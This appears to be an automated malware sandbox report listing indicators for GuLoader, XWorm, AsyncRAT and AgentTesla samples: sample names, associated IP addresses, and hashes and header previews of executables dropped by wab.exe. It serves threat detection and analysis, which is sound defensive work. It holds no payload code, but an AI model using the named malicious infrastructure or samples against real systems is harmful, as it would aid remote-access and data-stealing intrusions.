GTT-BACKBONEGTTDE | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.57
 | xff.cmd | malicious | AsyncRAT, GuLoader | 69.31.136.57
 | new.cmd | malicious | GuLoader | 69.31.136.57
 | las.cmd | malicious | GuLoader | 69.31.136.17
 | kam.cmd | malicious | GuLoader | 69.31.136.53
 | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.53
 | xff.cmd | malicious | AsyncRAT, GuLoader | 69.31.136.53
 | las.cmd | malicious | GuLoader, XWorm | 69.31.136.53
 | las.cmd | malicious | GuLoader | 69.31.136.53
 | kam.cmd | malicious | GuLoader | 69.31.136.57
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.17
 | new.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
 | filePY.cmd | malicious | Unknown | 172.67.170.105, 69.31.136.17
 | las.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
 | kam.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
 | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.17
 | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
 | S28BW-420120416270,pdf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.57
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.57
 | new.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.57
 | las.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.57
 | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.57
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.57
 | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.57
 | las.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.57
 | V_273686.Lnk.lnk | malicious | MalLnk | 172.67.170.105, 69.31.136.57
 | kam.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.57
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\AutoIt3\Au3Info.exe | kam.cmd | malicious | GuLoader
 | 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe | malicious | GuLoader, XWorm
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | kam.cmd | malicious | GuLoader
 | 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe | malicious | GuLoader, XWorm
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | kam.cmd | malicious | GuLoader
 | 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe | malicious | GuLoader, XWorm
C:\Program Files (x86)\AutoIt3\Au3Check.exe | kam.cmd | malicious | GuLoader
 | 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe | malicious | GuLoader, XWorm
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 275560
Entropy (8bit): 6.100887295483481
Encrypted: false
SSDEEP: 3072:/rkkP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvOIXM:/4VQjVsxyItKQNhigibKCM
MD5: AA874F4DC4061965993D91D3B5FC3639
SHA1: 9A35E342D18389963F6F13555913597EB6CBC59C
SHA-256: 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
SHA-512: FBD1F63321327AB227C25E88F9CD47FF713D452E526A3CAF892A008034EAC5F2A1E95C4B21F54372AC95F679C2C82EA31EC5883B81ABF1190AD949F1B4615961
Malicious: true
Joe Sandbox View:
• Filename: kam.cmd, Detection: malicious
• Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
Reputation: low
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 217704
Entropy (8bit): 6.356771671512563
Encrypted: false
SSDEEP: 3072:/rk3xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxTtd4N:y2K4TSFo5Y683TdiQMcGNUl4N
MD5: 0576F2AD6C31F9F557B9166A4E5B1CDE
SHA1: AA825C3A13A9528B2CE553B3CAB4DA4407CAEDF5
SHA-256: 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
SHA-512: D923411444B35DB3FEF062CBE129CC68FFFB4D8391185B94B93988DF76D6013158245164B837B4C86C529E9CF9848827EE7E564A521255D5A99F1B19F156AD4B
Malicious: true
Joe Sandbox View:
• Filename: kam.cmd, Detection: malicious
• Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
Reputation: low
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 237160
Entropy (8bit): 6.19362218837873
Encrypted: false
SSDEEP: 3072:/rkMyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:4l3wdYtcH9b5Y651zU77Ea
MD5: 6F302C0AA579B094CBE24E5B4DBD6D47
SHA1: 35C560D585FB0308949C02F8EC53DA22C7FA19AD
SHA-256: 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
SHA-512: 3817838FCEBEEF09CA3001B0B338CFF8BB74C42B73F2618016FC8294249609FA6CD65C955326D641E90F7DB74AEB00F90F6F3267A3071752BD2896A411513940
Malicious: true
Joe Sandbox View:
• Filename: kam.cmd, Detection: malicious
• Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1675872
Entropy (8bit):7.428945763224762
Encrypted:false
SSDEEP:24576:NC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:yK0eqkSR7Xgo4TiRPnLWvJY
MD5:61D6FED123118E8EE0BC42F1C0762E72
SHA1:F661A58070F467E80BA7592DDC3BB3ECE235A536
SHA-256:2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
SHA-512:2F0AE53557FAA193853E8646663F96A64BD17A078208ADBDD8FC6022002AB7F7D63EDD75FC9D44ADC1D5C744DC38CA16896A7DB381179685F04E6E59089144DB
Malicious:true
Joe Sandbox View:
• Filename: kam.cmd, Detection: malicious
• Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1841760
Entropy (8bit):7.32243413749646
Encrypted:false
SSDEEP:24576:LEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:ZfYP1JsEDkSR7Xgo4TiRPnLWvJD
MD5:783C051072E1D238DA994E95DABCBF6E
SHA1:1CB52C65962C8DD150B5ED7172631E14824A5102
SHA-256:C61EA0A64369DB217167BECC7A4D01AC2C97FA1D8CAD43189DCBEDD7F0142557
SHA-512:16ED187A7BB9AEA9278ADB0C43EF4B5A4D58228A4B66441377CFF5EDBAA4A84220AC0E7760DE606DBFA4672E82D99C6242FEC59946B33C1DBD4328DCB573EF5D
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):346624
Entropy (8bit):7.791635057531845
Encrypted:false
SSDEEP:6144:LpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZCWz:L9zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
MD5:B54F778BABB81D6C30BFA202F89EEE0D
SHA1:3D027D339CC635F6BA046CB90B041877CF562162
SHA-256:6090BBD5F090319967C17CDC4E2465EB8A680EE84647E863451B9B51453EE8AF
SHA-512:0B39C94016120EE7FE21DD9D1DC41AFB61330DAE90362F14F97A716304311EAD9D6BFFC44DD70C8B596802DAE6FF8F94504A3C56C6BE1914C1435CBEBBDA24EE
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):165976
Entropy (8bit):5.7704448291370625
Encrypted:false
SSDEEP:3072:/rk3okvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:pnGZLknnj1X62SYdb4I
MD5:6C5024852E53944BC5E619032E91EE75
SHA1:F3AF98C27CE37CF0157871DF3C376052F8F9312A
SHA-256:13AE96DD7EEA7B543FBF94CF173E0BAFB62C6604816D0C975DF0332E49F84582
SHA-512:84D6C4FACB7478128121755E024249599B1B0F71CDF1CD1A11CD6AE53C982367511ADCF8FA97021AEEBF01EFD9FA86051C8CF371D21153087F775069C792187F
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1113176
Entropy (8bit):6.40004020826486
Encrypted:false
SSDEEP:24576:2TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:2+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
MD5:42A434581A9BB44B8530A921550CF17E
SHA1:3E0078F0BA260036000968579F58BCCDBCD61769
SHA-256:67CEA6E433605652DA3BC35A75C9DE5222DFBEA9F063744037CD79BFF516D84E
SHA-512:9E391F0D8B059413373B68BBD5D0D2AD1B6397C238D2D26D32CAC1AA15CCD3202F514330967722F91DA4E7BA550D5892CFF4DA63B1EB6A66A14C9C463F66A1DB
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2414080
Entropy (8bit):6.710317121419989
Encrypted:false
SSDEEP:49152:h0GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:e4OEtwiICvYMpfc
MD5:A24DA8C79D1B52417FFE52CC6A36A43A
SHA1:141012704D8BE413B7D7BF129B184764B7439179
SHA-256:1EB0A26BC91C6AA08A426DDDFF8615E5A0D374E9AC6E89FF0C2EB0C73763A913
SHA-512:669911D738DA068785CBE44F2D8FB92AD18F08E7A8418EAF549E93D6DEC816F7242D71E3EA1A5F89FA3685E9415630E38FE4059D6B296148CF340A94AD662EEB
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):113233
Entropy (8bit):6.280496469967927
Encrypted:false
SSDEEP:1536:sEl9bbS3VofCrNGqLtZnMjbPmsAYBdTU9fEAIS2PEtuGCrK:/rkACrNGEtajbefY/TU9fE9PEtuGCrK
MD5:72C8B1DC3E7AEAD3B804FB784C9202DF
SHA1:5FDA23CBB7C3E82A938CE412C3C1574B1FB6350F
SHA-256:2CF1A48566846598E7134EB1F5E402937E1E0F4EDB4B522D2CB44681076882B2
SHA-512:DD5E57335DEA15FDC81198636D7ACFF27B49A8D0C50BBC8B26E3106A149D9889E1DDABB277CFA8279204B82155111DDE933E64203C5715D290017F9BBD169914
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):409608
Entropy (8bit):6.339039046737096
Encrypted:false
SSDEEP:6144:UvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:xbgvuFuQdj+zRTJkX8yMhB3jhBAi
MD5:8D0A97059A190F777B425ECF1E8E9442
SHA1:C450D9422A0DB8C39A274C1F3EBB2255A4D40E03
SHA-256:029089E37E60DA6EE61E08C9C92E0FC48DE78D3FF53A566A71FB9795359E0196
SHA-512:609093002FB13CD8776BAC599EC0E3D999F4BB71DC3128834A3E5A7642E85BF0B694A834E898B6A0614F4B0E2F3A7A87D99030DB7677DBC55F140079CB304C19
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):214512
Entropy (8bit):6.242999725098675
Encrypted:false
SSDEEP:3072:/rkfGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzDI5:KGUcsvZZvUmubv7hTHA8l3yROJyDI5
MD5:D90DDA30DA5ED08959042648374D9153
SHA1:37FD707B384D7684584D6D6B45FC75EDA02FFFBF
SHA-256:F01F16359CC5BEAAC9A59BDAAA78BBB172F5B852875FDCC7CDB90C10F6AC22AF
SHA-512:C27C0493D611882BE6FA63C3A3AD1B0FBDA7F2D4FDCDB0DCAB363DA3FEA78AA1814DAF31A86EF3064B39B20F0E41E87A851E506F54D89C47E856923E8788EC5B
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):568400
Entropy (8bit):6.589660608389939
Encrypted:false
SSDEEP:12288:TyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:TyyLj8trn3wsq0vq
MD5:267DDE27EAF6950E8CA2FAB44777A6A1
SHA1:940CD4BFA9B26FD75B23799055124DBE7AEC548A
SHA-256:7B7F7DF16EC41961DAEC3DCE736D6127F9ABA03779BEC8B65EA24553FD1B52DA
SHA-512:1FB1A1CB24D549539F87CDDAEC0F54DF66B7DC3C1C9C0BDAA8DED690AC722F846380D034422110F52F171D5148C78B745D4FC88C6B98A23F3CFE064CE2CDFBD9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Windows Mail\wab.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1252432
Entropy (8bit):6.722333632620241
Encrypted:false
SSDEEP:24576:j0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:o4iwwGJra0uAUfkVy7/ZX
MD5:807BDA887A05224A70C5F1AF88260DC0
SHA1:40730E1667845DF510113D6A477BEDC0ACEE36CB
SHA-256:72AD734C38933328D519289803AD0B298949FD607A90DBB31D6D04CE39514A90
SHA-512:4BD27971FE05BAE431C2EF948265F457DB368331860B6DDB5C96F6DF5BB09F5548C737315EA2D7ECBF81E3E8885AF26D61ED95F4C050DFD8BE833ABD06733BB9
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 790096
Entropy (8bit): 6.685520086044301
Encrypted: false
SSDEEP: 12288:lMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:dR0gB6axoCfyR6RLQRF/TzJqe58BimIh
MD5: 611DE7B526AD3AD4E09E47C1B86367D9
SHA1: 583621B2438FAF2B485C7D4FBEF403747CD57EEF
SHA-256: A62D1854968811331942010168652BB4C33F2EAC89067A91AA70F16D711FE2E2
SHA-512: 04296781297F2F306E0DF63EDD314979DD37EBAF334D6E58DE9DA8BA095C3BA8210E8A4A4EFBB8A51CEC06B9DE12B659F431056648558C792A80D167DE975728
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 562776
Entropy (8bit): 6.325980130189127
Encrypted: false
SSDEEP: 6144:s0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:beqbWqB3sunrT9+aYFLq3ny7JSEBPj
MD5: ADA3590FA13D77AF34248A7A04D577C4
SHA1: 5016D3685BB6571982250A3B8414BB002408CB32
SHA-256: 6CDB640EE5BDA123CFEF08A8E423851C050CEA0784ECB9BFEF50D07C17F01A5A
SHA-512: 669E54F4C248B265DC8C422E642B79DB44C60051F7782258A9B8A0725170E7229CE4BFD48F5980BD6C099096F7DE91B3ADDE32D6098D099B5BF2CC5FDB0DD426
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 127512
Entropy (8bit): 5.882565985204679
Encrypted: false
SSDEEP: 3072:/rkQPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:ng1MOc81hmRFJs0Z
MD5: 2410DBD92B226D1A105A7DD336B7E89B
SHA1: 4A75AE111CC58ED86D157D69C139AEE5D5753B3D
SHA-256: 87102C0F0150FDF75EF59A2E9B83BF9FD5A82A333AEBA3E64FF0CEBF1C9CE326
SHA-512: 96BB8E23F7A78FE9E335A3AB17B78F6B33D85E6EAC34CD8096EC7C98EAA3B1233442566903A56F6DE0CAD915EC097CC9146F7E43D0DEC1E31AFA2F193020212F
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 299136
Entropy (8bit): 6.630224066462407
Encrypted: false
SSDEEP: 6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
MD5: 4839E0285791329EE319914A14C4C058
SHA1: CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
SHA-256: 06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
SHA-512: D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 299136
Entropy (8bit): 6.632805023719349
Encrypted: false
SSDEEP: 6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
MD5: EBA58103571EA9B107B0F846E6C5A2E7
SHA1: 1318DB16558A362755692C6B3A4F9786F5A3CD38
SHA-256: 66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
SHA-512: A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 437888
Entropy (8bit): 6.304281817676703
Encrypted: false
SSDEEP: 12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
MD5: 9547D26AD745DF9D0CCE708C32590984
SHA1: 146AE790CEDE84FA4B245D08B8F057354E39474C
SHA-256: 1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
SHA-512: 85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 343328
Entropy (8bit): 6.499135917181153
Encrypted: false
SSDEEP: 6144:okTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:oklinJruphfg26p2Ewix+m8Nln3
MD5: B0A00074F3B1720E1C604BE0552617EA
SHA1: DB37A895170BBDA9CC760751028C7C0735392DA3
SHA-256: 284DBBCA777F4345B9863AC13E44E9430D699214EFB86A86940CE5DD0340587D
SHA-512: FC3A9014266BBDA5AB0AA1A00FEF9096A42B61B8D512045D90B0C702EAFB4A02A5683D686FC962EDF7D88DC48D50E28C16CB1187AEC032D08EC543BD8A4AF1D9
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 443680
Entropy (8bit): 6.273434344232977
Encrypted: false
SSDEEP: 12288:V3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:Vx5k8hb0Haw+x5x
MD5: 8131AEDBC96AF343D27A37721104C7BA
SHA1: 169AC23A617F55EC5F1CD091B8C202FA8C145503
SHA-256: FB7BFAF4B58771A348415FCC6E4122ABCA4082C3328A7CBFFEA57215A9C5E005
SHA-512: 3D8BAB13EFB2F919677EF26C1C1177BB0FD4C434325B60636C47B9C543061B41C6860912DD18CFF4133A4D27D2C608216682BE25B7B4B79C5DCB03D7A67D5378
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 203552
Entropy (8bit): 5.824786358578104
Encrypted: false
SSDEEP: 3072:/rkCaKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31OK8sws:5aK2h9H/B+rEtiPC
MD5: 9ABF58ADF874CBD3B1C98C5A8C00952C
SHA1: 384560927BED37C8EA188EA513564D6A5D963BC9
